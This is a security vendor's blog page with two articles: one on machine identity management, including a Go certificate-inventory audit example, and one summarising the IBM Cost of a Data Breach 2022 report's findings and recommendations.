Identity security is not a new idea, but it gained urgency as attackers began to abuse machine identities, and the access they carry, to achieve their goals.

Attackers have been successful in targeting Active Directory and other identity infrastructure to move laterally across vulnerable networks.

It is worth mentioning that the use of multifactor authentication (MFA) is growing, but it is still necessary to configure, maintain, and monitor the identity infrastructure properly.

In this article, we will explain everything about this subject. To facilitate your reading, we divided our text into topics. These are:

  • What is Machine Identity?
  • Importance of Machine Identity Management
  • Challenges in Machine Identity Management
  • Seven Best Practices in Machine Identity Management
  • Other Best Practices
  • About senhasegura
  • Conclusion

Enjoy the read!

What is Machine Identity?

Just as people prove who they are with usernames and passwords, machines have unique identities established and protected by credentials of their own, chiefly cryptographic keys and digital certificates.

Without proper machine identity management, it becomes impossible to guarantee that data exchanged between authorized devices stays confidential, or to prevent that data from flowing to unauthorized machines.

In practice, a machine with a compromised identity can damage the company's digital security, because attackers can use it to gain privileged access to data and resources on the organization's networks.

Moreover, by stealing or forging a machine identity, an attacker is able to impersonate a legitimate machine and obtain sensitive data.

To account for the volume, variety, and speed of changes in machine identity, one needs to strategically manage a complex and rapidly changing data set.

Through appropriate policies and controls, machine identity management contributes to optimizing a corporation’s cybersecurity, reducing risks, and ensuring compliance with security requirements.

Importance of Machine Identity Management

Proper machine identity management is critical to preventing compromised credentials, keys, and certificates from being used to break into infrastructure, gain access to sensitive data, or set up fraudulent encrypted tunnels that hide malicious traffic.

It also makes it possible to keep pace with the rapid growth in the number of machines, keeping their identities secure, and with the evolution of cloud services, which can expose machine identities to attackers.

With the correct machine identity management, it is also possible to protect mobile devices, sensors, and robots, which can communicate and store sensitive information using encryption.

In addition, we live in a context where machines have increasingly intelligent functions, replacing people in activities that require logical reasoning and thinking, and machine identity management allows us to interact securely with this type of equipment.

Challenges in Machine Identity Management

In the previous topic, we showed the importance of machine identity management in data protection. However, we know efficient machine identity management can be quite challenging.

One of the reasons is the increase in IT and OT devices, which also increases the number of credentials, certificates, and keys.

Also, traditional practices are insufficient to meet the demands of machine identity management, which leaves gaps that lead to cyberattacks and service interruptions.
In this sense, the most common challenges are:

Visibility

With a large number of machine identities, it becomes difficult to keep track of existing credentials and know where they are. With this, hidden certificates can expire without anyone noticing, causing an interruption in activities.

Besides being difficult to locate all certificates on a company’s network, some of them are on devices outside the network perimeter, which can go unnoticed by audit processes.

Compliance

To ensure compliance with security requirements, it is essential to govern how identities are issued, how long they remain valid, what security level (key size and algorithm) they use, and who can access them. Without machine identity management that covers TLS/SSL certificates and SSH keys, gaps open up for malicious actors.

Storage

It is very common for certificates and keys to be stored in spreadsheets and distributed by email. However, as the number of machine identities grows, tracking them in spreadsheets becomes error-prone, and a key sent by email is a key that has been copied.

Manual Management

Manual machine identity management is also a mistake, as it makes the process slow and error-prone.

In practice, applications and devices are slow to come online when certificates have to be registered and provisioned by hand. In addition, manual renewal, revocation, and auditing can cause service interruptions.

Seven Best Practices in Machine Identity Management

Here are some practices you need to adopt in your organization’s machine identity management:

Identify This Type of Identity in the Infrastructure

Two hundred and sixty-seven thousand: this is the average number of internal certificates that an IT organization has, according to the Ponemon Institute. Many of these certificates are old, and may be hard-coded into applications or hidden among other identities.

To get a sense of it, in a survey by Vanson Bourne, 61% of companies admitted they do not have full knowledge of the keys and certificates on their devices. Of these, 96% reported consequences such as breaches, system outages, and financial losses.

To ensure proper machine identity management, you need visibility into the devices your company uses. Therefore, it is essential to verify this type of identity in the infrastructure.

The good news is that you can count on the support of senhasegura for this: we were considered by Gartner as best in class for the discovery and integration of privileged credentials.

Periodically Rotate Machine Identities

Another indispensable measure is to rotate machine identities periodically to prevent their misuse by malicious users.

This is because the longer a key or certificate stays the same, the more time an attacker has to steal it; with a genuine key or certificate in hand, the attacker can make legitimate-looking API calls and gain access to critical resources and data.

To avoid this problem, organizations must explicitly authorize every source machine, cloud connection, portable device, application server, and API interaction, and renew the certificates behind them frequently, favoring short validity periods.

Implement Privileged Access Management solutions

To perform proper machine identity management, we also recommend the use of Privileged Access Management (PAM) tools. This type of solution prevents cyberattacks as it grants each user only the access necessary to perform their tasks.

We, from senhasegura, are leaders in this market and can help you protect the machine identities of your organization.

Implement Automation in the Environment Through RPA and PTA

Robotic Process Automation (RPA) consists of the use of technological tools to automate operational and transactional tasks, such as sending e-mails, checking financial data, preparing receipts, and managing payrolls.

Privileged Task Automation (PTA) automates an organization’s workflow tasks, ensuring they are completed at any time without stopping operations. These two mechanisms contribute to preventing violations motivated by human errors.

Nevertheless, it is necessary to manage the identities of software robots, starting with the definition of the best policies on how to integrate them.

Reduce Risk with Zero Trust Plans

To provide more security to machine identity management, it is advisable to extend the concept of zero trust to equipment. That is, it is not enough to authenticate corporate users continually; the same standard must be applied to devices.

The problem is that, despite already adopting this people-focused work model, many companies still consider device authentication a challenge.

Include the Cloud in the Machine Identity Management Plan

With the digital transformation accelerated by the Covid-19 pandemic, many companies started operating in the remote work model, using cloud solutions.

Therefore, when we talk about machine identity management, it is necessary to think of solutions that contemplate cloud environments.

Ideally, adopt an approach that centralizes these functions and can manage multiple cloud deployments from one place.

Adopt Machine Identity Management Solutions

Companies need to have teams specifically responsible for machine identity management, preventing certificates and keys from remaining unmanaged.

And to optimize this work, it is advisable to adopt automated machine identity management solutions that manage the entire certificate lifecycle.

Automated solutions are very effective and allow scalability in organizations, following the implementation of new technologies. However, machine identities should not be implied but expressly assigned.

Other Best Practices

Here are some other best practices for you, who need to deal with machine identity management.

Ensure Visibility

For no machine to be left unmanaged, it is indispensable to make a scan of all certificates and keys. This search should include devices that are outside the network perimeter. In addition, it is important to know the location, CA, and expiration date of each certificate.

Count on Centralized Management

Centralizing machine identity management is a way to simplify its implementation across environments, devices, and workloads. It is also possible to group certificates, taking into account their type, level of criticality, and expiration date.

Proper machine identity management protects communication and prevents the action of malicious attackers.

Use Self-Service

It is possible to use self-service for the provisioning, renewal, and revocation of certificates, making machine identity management more efficient. To keep identities protected while still limiting what each team can do, pair self-service with role-based access control and clearly assigned privileges.

Store Certificates and Keys in Secure Locations

Digital certificates and SSH keys should be stored in centralized and secure locations, preferably in encrypted storage such as a key vault or hardware security module. Moreover, access to these stores should be limited to privileged users, with strong authentication and RBAC.

These measures ensure the security of the machine identity, even if the network is compromised.

Key Rotation

Many companies are vulnerable to malicious former employees who still hold old certificates and keys. To avoid this problem, we strongly recommend rotating old keys and certificates, replacing them with new ones, and revoking any that a former employee may still have access to.

Automation

As we have already suggested, automation addresses many of the issues discussed above. In the case of machine identity management, automating the process ensures keys and certificates are always up to date and avoids problems such as outages caused by an expired certificate nobody was tracking.

Perform Audits Frequently

Performing frequent audits on machine identities is important because this process allows one to detect and eliminate issues such as weak passwords, unauthorized or expiring certificates, and old and unused keys.

For this, you can use an audit solution provided by third parties. Thus, it is possible to avoid interruption of activities, prevent violations, and optimize machine identity management.
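The visibility, key rotation, and audit practices above all come down to the same mechanical check: parse every certificate you can find, read its issuer and expiry, and flag the ones that are expired, about to expire, signed by a CA you do not recognize, or backed by a weak key. The Go program below is an added example written for this page, not senhasegura's code or any product's scanner. It mints three constructed certificates with a fixed clock (the hostnames, the CA name, the 30-day renewal window, and the 2048-bit RSA / 256-bit EC thresholds are assumptions of the example) and runs that audit over them; in a real scan the DER bytes would come from the hosts, load balancers, and containers being inventoried.

```go
package main

import (
	"crypto"
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"crypto/x509/pkix"
	"fmt"
	"math/big"
	"time"
)

// Finding is the audit result for one certificate in the inventory.
type Finding struct {
	Subject  string
	Issuer   string
	NotAfter time.Time
	Issues   []string // empty when the certificate passes every check
}

// AuditCertificates takes DER certificates as a discovery scan would collect them
// and flags: expired or soon-expiring certificates (renewal due), weak keys
// (RSA below 2048 bits, EC curves below 256 bits) and issuers not on the approved CA list.
func AuditCertificates(ders [][]byte, now time.Time, renewWithin time.Duration, approvedCAs map[string]bool) ([]Finding, error) {
	var out []Finding
	for _, der := range ders {
		cert, err := x509.ParseCertificate(der)
		if err != nil {
			return nil, err
		}
		f := Finding{Subject: cert.Subject.CommonName, Issuer: cert.Issuer.CommonName, NotAfter: cert.NotAfter}
		switch {
		case now.After(cert.NotAfter):
			f.Issues = append(f.Issues, "expired")
		case cert.NotAfter.Sub(now) < renewWithin:
			f.Issues = append(f.Issues, "expires soon: rotate")
		}
		switch k := cert.PublicKey.(type) {
		case *rsa.PublicKey:
			if k.N.BitLen() < 2048 {
				f.Issues = append(f.Issues, fmt.Sprintf("weak RSA key (%d bits)", k.N.BitLen()))
			}
		case *ecdsa.PublicKey:
			if k.Curve.Params().BitSize < 256 {
				f.Issues = append(f.Issues, "weak EC curve")
			}
		default:
			f.Issues = append(f.Issues, "unsupported key type")
		}
		if !approvedCAs[cert.Issuer.CommonName] {
			f.Issues = append(f.Issues, "issuer not on approved CA list")
		}
		out = append(out, f)
	}
	return out, nil
}

var serial int64 // demo-only serial counter

// mint signs a leaf certificate for the demo. It exists only to build sample input;
// a real inventory parses certificates collected from the hosts being scanned.
func mint(subjectCN, issuerCN string, pub any, signer crypto.Signer, notAfter time.Time) []byte {
	serial++
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(serial),
		Subject:      pkix.Name{CommonName: subjectCN},
		NotBefore:    notAfter.AddDate(-1, 0, 0),
		NotAfter:     notAfter,
	}
	parent := &x509.Certificate{Subject: pkix.Name{CommonName: issuerCN}, PublicKey: signer.Public()}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, parent, pub, signer)
	if err != nil {
		panic(err)
	}
	return der
}

// SampleInventory builds three constructed certificates and audits them with a
// fixed clock so the result is reproducible.
func SampleInventory() ([]Finding, error) {
	now := time.Date(2024, 6, 1, 0, 0, 0, 0, time.UTC)
	caKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader) // signer for the approved internal CA
	if err != nil {
		return nil, err
	}
	goodKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		return nil, err
	}
	weakKey, err := rsa.GenerateKey(rand.Reader, 1024) // deliberately undersized
	if err != nil {
		return nil, err
	}
	inventory := [][]byte{
		mint("api.internal.example", "Corp Internal CA", &goodKey.PublicKey, caKey, now.AddDate(0, 0, 300)),
		mint("legacy-db.internal.example", "Corp Internal CA", &weakKey.PublicKey, caKey, now.AddDate(0, 0, 10)),
		mint("build-agent-07", "Ad-hoc Self-Signed", &goodKey.PublicKey, goodKey, now.AddDate(0, 0, -5)),
	}
	return AuditCertificates(inventory, now, 30*24*time.Hour, map[string]bool{"Corp Internal CA": true})
}

func main() {
	fs, err := SampleInventory()
	if err != nil {
		panic(err)
	}
	for _, f := range fs {
		fmt.Printf("%-28s issuer=%-20s notAfter=%s issues=%v\n", f.Subject, f.Issuer, f.NotAfter.Format("2006-01-02"), f.Issues)
	}
}
```

The API certificate passes; the legacy database certificate is flagged twice (renewal due and a 1024-bit key), and the build agent's self-signed certificate is both expired and issued by nobody the organization trusts. Run on a real inventory, the "issuer not on approved CA list" finding is usually the most interesting one: it is how ad-hoc and shadow certificates surface.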

About senhasegura

We, from senhasegura, are part of the group of information security companies MT4 Tecnologia, founded in 2001, and we aim to provide digital sovereignty to our customers through the control of privileged actions and data.

With this, we prevent data leaks and theft, as we manage privileged permissions before, during, and after access through machine automation. We work to:

  • Optimizing the performance of companies, avoiding interruption of operations;
  • Performing automatic audits on the use of permissions;
  • Auditing privileged changes to detect abuse of privilege automatically;
  • Providing advanced solutions with the PAM Security Platform;
  • Reducing cyber threats; and
  • Bringing the organizations that hire us into compliance with audit requirements and standards such as PCI DSS, Sarbanes-Oxley, ISO 27001, and HIPAA.

Conclusion

In this article, you saw that:

  • Machines have their unique identities protected by keys and certificates;
  • The increase in IT and OT machines generates a significant growth in the number of certificates and keys;
  • Without proper machine identity management, it becomes impossible to guarantee the confidentiality of data obtained by authorized machines and to prevent this information from being transferred to unauthorized ones;
  • Malicious actors can use compromised machine identities to gain privileged access to data and resources from the organization’s networks;
  • Machine identity management contributes to optimizing the cybersecurity of a corporation;
  • It also allows one to keep up with the exponential growth in the number of machines and protect mobile devices, sensors, and robots;
  • The main challenges in machine identity management are: visibility, compliance, storage, and manual management;
  • Some of the best practices for this management are: recognizing machine identities, rotating these identities periodically, implementing Privileged Access Management solutions, implementing automation in the environment, reducing risks through the Zero Trust concept, including cloud solutions in machine identity management, and adopting automated machine identity management solutions;
  • It is also essential to ensure the visibility of devices, rely on centralized management, use self-service, store certificates and keys in secure places, and perform audits frequently;
  • senhasegura was considered by Gartner as best in class for discovery and integration of privileged credentials;
  • In addition, the company provides a PAM solution, which avoids cyberattacks through the Principle of Least Privilege.

Did you like our content on machine identity management? Then share it with someone who may be interested in the topic.

The Highlights of the IBM Cost of a Data Breach 2022 report

Companies of all sizes and industries should be concerned about the impacts of a data breach, since, according to the IBM Cost of a Data Breach 2022 report, its average cost is $4.35 million, and 83% of companies had more than one breach.

With this in mind, we prepared an article exploring the main information collected by this document. To facilitate your reading, we divided our text into topics. These are:

  • What Is the IBM Cost of a Data Breach Report?
  • IBM Cost of a Data Breach 2022 report: What’s New
  • Main Data Collected in the IBM Cost of a Data Breach 2022 Report
  • Topics with Detailed Results
  • Suggested Security Recommendations in the Report
  • About senhasegura

Enjoy the read!

What Is the IBM Cost of a Data Breach Report?

The IBM Cost of a Data Breach report is an annual survey of data breaches, which provides insights into hundreds of breaches so that the public can understand current cyber threats.
With nearly 20 editions, this document provides IT professionals with tools to deal with security risks, showing which factors can favor or help prevent cyberattacks.

IBM Cost of a Data Breach 2022 report: What’s New

In its latest edition, the IBM Cost of a Data Breach report drew on more than 3,600 interviews with professionals from 550 companies that suffered breaches between March 2021 and March 2022.
The questions made during the interviews aimed to evaluate the costs of organizations to respond to data breaches in the short and long term.

What's more, the report assessed the causes and consequences of the breaches that occurred across 17 industries in different countries and regions, and addressed the impact of specific factors and technologies on reducing losses.

Here are some new things from the IBM Cost of a Data Breach report:

  • The 2022 edition has brought analyses related to extended detection and response, the use of risk quantification techniques, and the impacts of individual technologies on zero-trust security structures;
  • It analyzed what contributes to higher data breach costs, including the effects of supply chain compromises and the security skills gap;
  • It examined areas of vulnerability in cloud security and in critical infrastructure;
  • It assessed, in greater depth than in previous years, the impacts of ransomware and destructive attacks; and
  • It studied the phenomenon of remote work, which many companies adopted due to the covid-19 pandemic.

Main Data Collected in the IBM Cost of a Data Breach 2022 Report

Check the key findings from the IBM Cost of a Data Breach 2022 report:

  • The average cost of a data breach was $4.35 million in 2022, an increase of 2.6% over the previous year, when the average cost was $4.24 million;
  • 83% of the companies studied suffered more than one data breach, and only 17% said this was their first breach;
  • 60% of organizations had to increase the price of their services or products because of a data breach;
  • The average cost of a data breach for the critical infrastructure organizations surveyed was $4.82 million, $1 million more than the cost for companies in other sectors;
  • 28% of critical infrastructure organizations suffered a destructive or ransomware attack, and 17% were breached through a compromised business partner;
  • Breaches at companies with fully deployed security AI and automation cost $3.05 million less than breaches at organizations that have not invested in these capabilities;
  • The average cost of a ransomware attack fell from $4.62 million in 2021 to $4.54 million in 2022;
  • Stolen or compromised credentials remain a leading cause of data breaches, accounting for 19% of breaches in the 2022 study;
  • Breaches involving stolen or compromised credentials take the longest to identify and contain: 327 days on average;
  • Only 41% of the organizations in the study had deployed a zero-trust security architecture;
  • Breaches in which remote work was a factor cost, on average, about $600,000 more than the global average;
  • 45% of the breaches in the study occurred in the cloud;
  • The average cost of a healthcare breach increased by almost $1 million, reaching $10.10 million;
  • The five countries and regions with the highest average cost of a data breach were the United States, the Middle East, Canada, the United Kingdom, and Germany.

Topics with Detailed Results

The IBM Cost of a Data Breach 2022 report analyzes 16 topics. These are:

  • Global Highlights;
  • Data Breach Lifecycle;
  • Initial Attack Vectors;
  • Key Cost Factors;
  • Security and Automation AI;
  • XDR Technologies;
  • Incident Response (IR);
  • Quantification of Risk;
  • Zero Trust;
  • Ransomware and Destructive Attacks;
  • Attacks on the Supply Chain;
  • Critical Infrastructure;
  • Cloud Breaches and Cloud Model;
  • Remote Work;
  • Skills Gap; and
  • Mega Breaches.

The following are five of these topics in detail:

Data Breach Lifecycle

The lifecycle of a data breach is the time elapsed between the initial compromise and the containment of the breach, that is, the time taken to identify it plus the time taken to contain it.

According to the IBM Cost of a Data Breach 2022 report, the average time to identify and contain a data breach is currently 277 days. In 2021, the average was 287 days, that is, 3.5% more.

In 2021, it took an average of 212 days to identify a breach and 75 days to contain it. In 2022, it took 207 days to identify the breach and 70 days to contain it.

The report has also shown that the less time an organization takes to identify and contain a data breach, the less its financial impact is.

However, the cost difference between a lifecycle of more than 200 days and one of less than 200 days was smaller in 2022 than in 2021: in 2021 the difference was $1.26 million, the largest in seven years, and in 2022 it was $1.12 million.

Incident Response

Having an incident response team reduces the average cost of a data breach and, according to the IBM Cost of a Data Breach 2022 report, 73% of the companies that participated in the survey said they had an incident response plan.

The report also pointed out that the average cost of a breach at companies with an IR team and a regularly tested plan was $3.26 million in 2022, versus $5.92 million at companies with neither, a difference of $2.66 million. In the previous year, this difference was $2.46 million, and in 2020, $1.77 million.

Zero Trust

41% of the companies that participated in the IBM Cost of a Data Breach 2022 report had deployed a zero-trust security architecture. In 2021, this number was lower: 35%.

The study also revealed that companies that deployed zero trust saved almost $1 million per data breach compared to those that did not invest in this approach.

This is because the average cost of a breach was $4.15 million in organizations with zero trust deployed and $5.10 million in companies that did not use the same approach.

When zero trust is implemented at a mature stage, the savings are even greater, exceeding $1.5 million. Companies with early-stage zero trust practices spent an average of $4.96 million per data breach, while for those with consolidated practices the average cost was $3.45 million.

Cloud Breaches and Cloud Model

The Covid-19 pandemic has accelerated the mass adoption of remote work by organizations and, consequently, the use of technologies such as cloud computing, impacting cybersecurity.

The IBM Cost of a Data Breach 2022 report brings interesting data on the subject, which it analyzed for the second year: according to the document, 45% of breaches occurred in the cloud. Moreover, the cost of breaches in private clouds was significantly higher than in hybrid clouds.

Another revealing fact is that 43% of companies claimed they were still in the early stages of their practices protecting cloud environments, showing that, in general, organizations still need to evolve a lot.

Nevertheless, the most worrying fact is that 17% of companies have yet to take any action to protect their cloud environments.

Remote Work

Since the beginning of the pandemic, the IBM Cost of a Data Breach report analyzes the impacts of remote work on data breaches. In its 2022 edition, the survey has shown data breach costs were higher for companies that have more employees working remotely.

In practice, companies that have between 81% and 100% of employees working outside the corporate environment had an average cost of $5.10 million. Companies with less than 20% of their team working remotely had to bear an average cost of $3.99 million, a difference of $1.11 million (24.4%).

In addition, the average cost of a data breach was $4.99 million for companies that had remote work as the cause of the breach, while this loss was $4.02 million when remote work was not the cause.

Suggested Security Recommendations in the Report

The IBM Cost of a Data Breach 2022 report also contains important security recommendations on its pages, which can help prevent problems with data breaches. Check them out:

Adopting a Zero Trust Security Model

According to the results of the study, organizations with a mature zero-trust approach saved $1.5 million per breach compared with those at an early stage. Adopting this security model is therefore a sound way to reduce the financial impact of a data breach.

Protecting Cloud Environments with Policies and Encryption

Companies with mature cloud security practices saved $720,000 per breach compared with those whose practices were at an early stage or absent. The report therefore recommends investing in security policies and data encryption, including homomorphic encryption, to limit the damage of a data breach.

Using Incident Response Playbooks

Another highly recommended practice is to create and regularly test incident response playbooks: companies that tested their plan regularly saved $2.66 million per breach over those that had neither an IR team nor a tested plan.

Improving Incident Detection and Response Times

Together with security AI and automation, Extended Detection and Response (XDR) capabilities help reduce both the average cost of a data breach and its lifecycle. The study found that companies with XDR deployed shortened the breach lifecycle by 29 days on average, compared to organizations without XDR, and saved about $400,000 per breach.

Monitoring Endpoints and Remote Employees

Finally, the IBM Cost of a Data Breach 2022 report reinforces the need to monitor endpoints and remote workers, showing that breaches in which remote work was a factor cost almost $1 million more than breaches in which it was not.

About senhasegura

We, from senhasegura, are a company specializing in cybersecurity. Our mission is to provide our clients with sovereignty over their actions and privileged information.
To do this, we offer our PAM solution, which helps companies protect themselves against many of the threats presented in the IBM Cost of a Data Breach 2022 report, in particular those involving stolen or compromised credentials.
